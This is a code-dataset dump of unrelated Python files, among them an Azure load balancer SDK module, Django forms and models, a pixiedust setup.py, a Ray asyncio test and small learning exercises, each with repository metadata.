for key in ignore_keys:
new_dct.pop(key, None)
return new_dct
@staticmethod
def sorted_param_keys(**filter_kwargs):
""" all known parameter keys of all groups """
return sorted([k for k in Group.__filter(Group.all_param_keys, **filter_kwargs).keys()])
def merge(self, other: 'Group'):
""" merge another group into this one, keep this name """
self.ids.extend(other.ids)
self.params.update(other.params)
self.data.update(other.data)
l0, l1 = len(self.results), len(other.results)
self.results.update(other.results)
assert len(self.results) == l0+l1, "Some results were overwritten by merging!"
def update_all_data(self, data: {str: dict}):
""" updates the data of all group members that are in the data dict """
for id_ in self.ids:
if id_ in data:
self.data[id_].update(data.get(id_))
def update_data(self, id_: int, data: dict):
""" updates the data of group member with slurm id """
self.data[id_].update(data)
def update_results(self, metrics: [Metrics]):
for m in metrics:
values, missing = self._values(key=m.get_key(), last_k=m.last_k)
try:
for result in m.from_values(values):
self.results[result.name] = max([result, self.results.get(result.name)])
Group.all_result_keys[result.name] = True
except KeyError:
raise KeyError('Missing key "%s" in: %s, but the metric requires it' % (m.get_key(), missing))
def _values(self, key: str, last_k=-1) -> (Union[np.array, None], list):
"""
all values, different group members on axis 0, time series on axis 1, (can be None)
and a list of slurm ids where the values are missing
"""
values = []
missing = []
for id_, data in self.data.items():
if key not in data:
missing.append(id_)
continue
v = np.array([v[2] for v in data.get(key)]) # tensorboard has (step, time, value) triplets
if isinstance(last_k, int) and (last_k > 0):
v = v[-last_k:]
values.append(v)
assert all([len(v) == len(values[0]) for v in values]), "different value-array lengths for key=%s" % key
if len(values) > 0:
return np.stack(values, axis=0), missing
return None, missing
def __header_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': 'name',
'ids': 'slurm_ids',
'params': separator.join(param_keys),
'values': separator.join(value_keys),
}
def __table_dict(self, separator: str, **filter_kwargs) -> dict:
# param_keys = Group.sorted_param_keys(**filter_kwargs)
param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
return {
'n': self.name,
'ids': str(self.ids),
'params': separator.join([str(self.params.get(k, '')) for k in param_keys]),
'values': separator.join([self.results.get(k, self.default_result).str for k in value_keys]),
}
def get_csv_str_header(self, **filter_kwargs) -> str:
""" table csv header, e.g. for libre office calc """
return '{n};{ids};;{params};;{values};'.format(**self.__header_dict(';', **filter_kwargs))
def get_csv_str(self, **filter_kwargs) -> str:
""" table csv row, e.g. for libre office calc, printing params and the metric values """
return '{n};{ids};;{params};;{values};'.format(**self.__table_dict(';', **filter_kwargs))
def get_latex_str_header(self, **filter_kwargs) -> str:
""" table header for latex """
        return '{n} & {params} & {values} \\\\'.format(**self.__header_dict(' & ', **filter_kwargs)).replace('_', '\\_')
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
        return '{n} & {params} & {values} \\\\'.format(**self.__table_dict(' & ', **filter_kwargs)).replace('_', '\\_')
class GroupSeparator(Group):
"""
simple hack to just insert a midrule into latex tables, and empty rows into csv data
will probably break everything if added first to a GroupManager, so don't do that
"""
_id = -1
def __init__(self, **kwargs):
self._id += 1
super().__init__('separator %d' % self._id, [], **kwargs)
def update_results(self, metrics):
pass
def get_csv_str(self, **filter_kwargs) -> str:
""" table row for libre office calc, printing params and the metric values """
return ''
def get_latex_str(self, **filter_kwargs) -> str:
""" table row for latex, printing params and the metric values """
return '\\midrule'
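# A minimal usage sketch (not part of the original module): it only exercises the
# API shown above, and the group name, slurm ids, parameters and the
# tensorboard-style (step, time, value) triplets are made up. Results would
# normally be filled in via update_results() with Metrics instances built
# elsewhere; the CSV header/row work without them.
if __name__ == '__main__':
    g = Group('lr0.01-sgd', ids=[101, 102], lr=0.01, optimizer='sgd')
    g.update_data(101, {'val/acc': [(0, 0.0, 0.71), (1, 1.0, 0.74)]})
    g.update_data(102, {'val/acc': [(0, 0.0, 0.69), (1, 1.0, 0.73)]})
    print(g.get_csv_str_header())
    print(g.get_csv_str())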
| [
"[email protected]"
] | |
bf827dd87006c899990aacccbb562772fcbfd3e6 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2021_05_01/operations/_load_balancer_frontend_ip_configurations_operations.py | be7b0ac5d709fb10ed6105bb3d5c250f99998522 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 9,049 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
"""LoadBalancerFrontendIPConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2021_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.LoadBalancerFrontendIPConfigurationListResult"]
"""Gets all the load balancer frontend IP configurations.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2021_05_01.models.LoadBalancerFrontendIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerFrontendIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
frontend_ip_configuration_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FrontendIPConfiguration"
"""Gets load balancer frontend IP configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param frontend_ip_configuration_name: The name of the frontend IP configuration.
:type frontend_ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FrontendIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2021_05_01.models.FrontendIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FrontendIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'} # type: ignore
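# A minimal usage sketch (not part of the generated file). As the class docstring
# notes, this operations class is not instantiated directly; it is reached through
# a client object. This assumes the azure-identity and azure-mgmt-network packages
# and uses placeholder resource names.
if __name__ == "__main__":
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.network import NetworkManagementClient
    client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
    # list() returns an ItemPaged iterator over FrontendIPConfiguration models
    for ip_cfg in client.load_balancer_frontend_ip_configurations.list(
            "my-resource-group", "my-load-balancer"):
        print(ip_cfg.name)
    # get() returns a single FrontendIPConfiguration
    one = client.load_balancer_frontend_ip_configurations.get(
        "my-resource-group", "my-load-balancer", "my-frontend-ip")
    print(one.name)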
| [
"[email protected]"
] | |
e5f98ccd8f816d3621fa6a5b9fd0132e0965826b | 30a89ae47ca79e4ced151908f4059cd77ade30ef | /order/forms.py | 0c700dce796932a329f19a1102f5113624a6fcd8 | [] | no_license | harshit8858/mindful_project1_salesapp | 0bd80c40b2349fe08744dcd0625283c5b6ba4029 | 66f7c7af868518898aa6422d1b17ca9f7cf433ef | refs/heads/master | 2020-03-24T00:02:49.972583 | 2018-08-18T07:56:49 | 2018-08-18T07:56:49 | 142,269,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from django import forms
from .models import *
class OrderForm(forms.ModelForm):
class Meta:
model = Order
fields = [
'customer',
'remark',
'product',
'quantity',
'price',
'discount',
'tax',
'total',
]
| [
"[email protected]"
] | |
8f4e42b65ce09e4a562f2d4b298babce0fd4be3b | 2417d9f6afe95ba19354c65bfb400556f2eb2e19 | /setup.py | 2a91c65f19fbb3863f4728098116fca13710074a | [
"Apache-2.0"
] | permissive | rakeshnb/pixiedust | 39f1249a867719919441488f085e1f60519dae58 | fb5198c7564589c267147d7bdee1f798e7b361ef | refs/heads/master | 2020-05-23T08:09:42.603871 | 2016-10-07T22:08:10 | 2016-10-07T22:08:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | from setuptools import setup
setup(name='pixiedust',
version='0.38',
description='Misc helpers for Spark Python Notebook',
url='https://github.com/ibm-cds-labs/pixiedust',
install_requires=['maven-artifact','mpld3'],
author='David Taieb',
author_email='[email protected]',
license='Apache 2.0',
packages=['pixiedust','pixiedust.packageManager','pixiedust.display',
'pixiedust.display.table','pixiedust.display.graph','pixiedust.display.chart','pixiedust.display.chart.plugins',
'pixiedust.display.tests','pixiedust.display.download',
'pixiedust.services',
'pixiedust.utils'],
include_package_data=True,
zip_safe=False) | [
"[email protected]"
] | |
9e970d6b5a4196876c2d30a1e3a820a778e6aabc | 4fe0d37eb4810d3aa5fca50a60bd8f57c2558673 | /build/ros_arduino_bridge/ros_arduino_python/catkin_generated/pkg.develspace.context.pc.py | cfcd6131b4b1dad06511bc5b36495eba4e78533a | [] | no_license | jim1949/gpsbot_ws | f0aa961472d65633f1d385426e6e0fd489a8e104 | 0dfa36223620ae226f6a40735179b6cae265693d | refs/heads/master | 2021-05-07T05:55:08.584882 | 2017-11-22T08:45:06 | 2017-11-22T08:45:06 | 103,118,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ros_arduino_python"
PROJECT_SPACE_DIR = "/home/relaybot/gpsbot_ws/devel"
PROJECT_VERSION = "0.2.0"
| [
"[email protected]"
] | |
aea5124f9f2718dae828e8f08e419c0c88fa27e0 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Analyst with Python - Career Track/01. Introduction to Data Science in Python/04. Different Types of Plots/05. Modifying histograms.py | 1ce32da1b97d613df25adfdb3b264ed5dbd7b8c8 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | '''
Modifying histograms
Let's explore how changes to keyword parameters in a histogram can change the output. Recall that:
range sets the minimum and maximum datapoints that we will include in our histogram.
bins sets the number of bins in our histogram.
We'll be exploring the weights of various puppies from the DataFrame puppies. matplotlib has been loaded under the alias plt.
Instructions
Create a histogram of the column weight from the DataFrame puppies.
Change the number of bins to 50.
Change the range to start at 5 and end at 35.
'''
# SOLUTION
# Change the range to start at 5 and end at 35
plt.hist(puppies.weight,
range=(5, 35))
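# A cumulative sketch (an assumption, since the pasted solution only shows the
# final range change): applying instructions 2 and 3 together would pass both
# keyword arguments, e.g.
#   plt.hist(puppies.weight, bins=50, range=(5, 35))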
# Add labels
plt.xlabel('Puppy Weight (lbs)')
plt.ylabel('Number of Puppies')
# Display
plt.show() | [
"[email protected]"
] | |
5e95d15bbcb402658a0aa5ca152150228122ffa4 | 88be3911c7e73d4bf71b0482ee6d15f49030463a | /SEC31_Regex/Demo_findall.py | efd4979649d52b8aed3afc6af63204120a6ce980 | [] | no_license | skyaiolos/Python_KE | 85f879d1cb637debd2e3a0239d7c8d7bfb30c827 | 8cc42c8f4d1245de4b79af429f72a9ed2508bc1a | refs/heads/master | 2021-01-22T08:47:47.761982 | 2017-05-28T14:57:02 | 2017-05-28T14:57:02 | 92,634,507 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | """
# Script Description:
    Python regular expressions: RegexObject (the compiled pattern object)
"""
__author__ = "爱的彼岸(QQ:3124724)"
__copyright__ = "Copyright 2017,[email protected]"
# Create by Jianguo on 2017/5/7
import re
text = "Tom is 8 years old, Mike is 25 years old."
# Pattern object: represents the compiled regular expression (compiled to bytecode and cached)
# re.compile(r'pattern')
print('findall()'.center(100, '*'))
pattern = re.compile(r'\d+')
print(pattern.findall(text))
print(re.findall(r'\d+', text))
s = "\\author:Tom"
pattern = re.compile(r'\\author')
rex = pattern.findall(s)
print(rex)
text = "Tom is 8 years old, Mike is 25 years old.Peter is 87 years old."
pattern = re.compile(r'\d+')
rex = pattern.findall(text)
print(rex)
p_name = re.compile(r'[A-Z]\w+')
rex_p = p_name.findall(text)
print(rex_p)
p1 = re.compile(r'\d+')
p2 = re.compile(r'[A-Z]\w+')
print('findall() VS finditer()'.center(100, '*'))
print(p1.findall(text))
print()
print('finditer()'.center(30, '*'))
it = p1.finditer(text)
for item in it:
print(item)
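# A small follow-on sketch (not in the original demo): finditer() yields Match
# objects, so the matched text is extracted explicitly, e.g. with group().
for item in p1.finditer(text):
    print(item.group())  # prints '8', '25', '87' for the text above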
| [
"[email protected]"
] | |
21a700bb20d695f0545a44e8ea56ccd2d5c1ecbd | d82ac08e029a340da546e6cfaf795519aca37177 | /chapter_13_parallel_nn_training_theano/02_array_structures.py | 041b18247a74fa59fe0cfc17db87096150e8cf80 | [] | no_license | CSwithJC/PythonMachineLearning | 4409303c3f4d4177dc509c83e240d7a589b144a0 | 0c4508861e182a8eeacd4645fb93b51b698ece0f | refs/heads/master | 2021-09-04T04:28:14.608662 | 2018-01-15T20:25:36 | 2018-01-15T20:25:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | import theano
import numpy as np
from theano import tensor as T
# Config Theano to use 32-bit architecture:
theano.config.floatX = 'float32'
#theano.config.device = 'gpu'
# initialize
x = T.fmatrix(name='x')
x_sum = T.sum(x, axis=0)
# compile
calc_sum = theano.function(inputs=[x], outputs=x_sum)
# execute (Python List)
ary = [[1, 2, 3], [1, 2, 3]]
print('Column sum:', calc_sum(ary))
# execute (NumPy array)
ary = np.array([[1, 2, 3], [1, 2, 3]],
dtype=theano.config.floatX)
print('Column sum:', calc_sum(ary))
print('TensorType: ', x.type())
| [
"[email protected]"
] | |
bd82d3e98d1a67cc87a28e599370a8b6475b91ae | 3467fe90c6c49b4ac86785d1da19d7183b2ac0f5 | /6002x/findCombination.py | 85d683714d531ae692f4b2fa142f7782b706f04d | [
"MIT"
] | permissive | CarlosEduardoAS/MITx | 277da453638da672c9946513bfb7a86e7446072b | 532695d69c77581b6df80c145283b349b75e4973 | refs/heads/main | 2023-05-02T13:50:15.283211 | 2021-05-25T20:02:48 | 2021-05-25T20:02:48 | 351,555,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 25 16:10:53 2021
@author: caear
"""
import numpy
import itertools
def find_combination(choices, total):
"""
choices: a non-empty list of ints
total: a positive int
Returns result, a numpy.array of length len(choices)
such that
* each element of result is 0 or 1
* sum(result*choices) == total
* sum(result) is as small as possible
In case of ties, returns any result that works.
If there is no result that gives the exact total,
pick the one that gives sum(result*choices) closest
to total without going over.
"""
power_set = []
for i in itertools.product([1,0], repeat = len(choices)):
power_set.append(numpy.array(i))
filter_set_eq = []
filter_set_less = []
for j in power_set:
if sum(j*choices) == total:
filter_set_eq.append(j)
elif sum(j*choices) < total:
filter_set_less.append(j)
    if len(filter_set_eq) > 0:
        # exact matches exist: return one that uses as few items as possible
        return min(filter_set_eq, key=lambda r: sum(r))
    else:
        # no exact match: return the subset whose value is closest to total
        # without going over
        return max(filter_set_less, key=lambda r: sum(r * choices))
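# A small usage sketch (editorial example values): with an exact match the cheapest
# exact subset is returned, otherwise the closest one without going over.
if __name__ == '__main__':
    print(find_combination([10, 100, 1000, 3, 8, 12, 38], 1110))
    # -> array([1, 1, 1, 0, 0, 0, 0]) since 10 + 100 + 1000 = 1110
    print(find_combination([1, 3, 5, 7], 20))
    # -> array([1, 1, 1, 1]) since 16 is the closest achievable sum below 20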
| [
"[email protected]"
] | |
ea385301144e17aa355e09063a6bd7bb66103bb1 | d7faf47825b6f8e5abf9a9587f1e7248c0eed1e2 | /python/ray/tests/test_asyncio_cluster.py | bea440bdf4b27bb1b625ec135c2bbc2bd5dd6d5b | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ggdupont/ray | 7d7c7f39a8f99a09199fab60897da9e48b8e2645 | 15391026c19f1cbbb8d412e46b01f7998e42f2b9 | refs/heads/master | 2023-03-12T06:30:11.428319 | 2021-12-07T05:34:27 | 2021-12-07T05:34:27 | 165,058,028 | 0 | 0 | Apache-2.0 | 2023-03-04T08:56:50 | 2019-01-10T12:41:09 | Python | UTF-8 | Python | false | false | 815 | py | # coding: utf-8
import asyncio
import sys
import pytest
import numpy as np
import ray
from ray.cluster_utils import Cluster, cluster_not_supported
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.asyncio
async def test_asyncio_cluster_wait():
cluster = Cluster()
head_node = cluster.add_node()
cluster.add_node(resources={"OTHER_NODE": 100})
ray.init(address=head_node.address)
@ray.remote(num_cpus=0, resources={"OTHER_NODE": 1})
def get_array():
return np.random.random((192, 1080, 3)).astype(np.uint8) # ~ 0.5MB
object_ref = get_array.remote()
await asyncio.wait_for(object_ref, timeout=10)
ray.shutdown()
cluster.shutdown()
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
| [
"[email protected]"
] | |
adf942ef17cc289e1c3cf16a609ecac205d03692 | fc314838b18c14a00310f0059d5358c7c4afabd6 | /special/models.py | 6796cb77ef4370af265ada4e6ba8966f501a7cd4 | [
"MIT"
] | permissive | opendream/asip | 5cb4b997fab2438193ae7490c159efced6dc3d91 | 20583aca6393102d425401d55ea32ac6b78be048 | refs/heads/master | 2022-11-28T23:28:18.405604 | 2020-03-10T04:56:23 | 2020-03-10T04:56:23 | 190,504,979 | 1 | 1 | MIT | 2022-11-22T01:10:46 | 2019-06-06T03:06:03 | HTML | UTF-8 | Python | false | false | 1,126 | py | from django.db import models
# Create your models here.
from common.constants import STATUS_PUBLISHED, STATUS_CHOICES
from common.models import AbstractPermalink, CommonTrashModel
import files_widget
class Special(CommonTrashModel, AbstractPermalink):
title = models.CharField(max_length=512)
image = files_widget.ImageField(verbose_name='Banner Image', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
def __unicode__(self):
return self.permalink
def get_absolute_url(self):
return '/%s/' % self.permalink
class Page(CommonTrashModel, AbstractPermalink):
special = models.ForeignKey(Special, related_name='pages', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
| [
"[email protected]"
] |